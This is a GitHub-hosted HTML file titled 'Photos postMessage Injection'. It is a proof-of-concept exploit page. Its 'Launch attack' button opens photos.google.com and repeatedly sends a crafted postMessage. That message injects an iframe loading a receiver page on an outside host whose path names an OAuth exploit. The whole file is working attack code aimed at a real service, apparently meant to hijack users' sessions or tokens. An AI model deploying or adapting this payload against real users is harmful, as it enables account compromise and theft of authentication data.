-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathattacker.html
More file actions
41 lines (37 loc) · 1.08 KB
/
attacker.html
File metadata and controls
41 lines (37 loc) · 1.08 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<!DOCTYPE html>
<html>
<head>
<title>Photos postMessage Injection</title>
</head>
<body>
<h2>Click to launch attack</h2>
<button onclick="launch()">🚀 Launch</button>
<script>
function launch() {
const popup = window.open("https://photos.google.com", "_blank");
const msg = {
type: "aloha_config",
config: {
authUser: "0",
alohaHostPageUrl: "https://photos.google.com/",
html: "<iframe src='https://musgaas.github.io/oauth-exploit/receiver.html'></iframe>",
marker: "📷 autoload test"
}
};
let tries = 0;
function send() {
if (popup && !popup.closed) {
try {
popup.postMessage(msg, "*");
console.log("✅ Message sent");
} catch (e) {
if (tries++ < 10) setTimeout(send, 1000);
else console.error("❌ Giving up.");
}
}
}
setTimeout(send, 3000);
}
</script>
</body>
</html>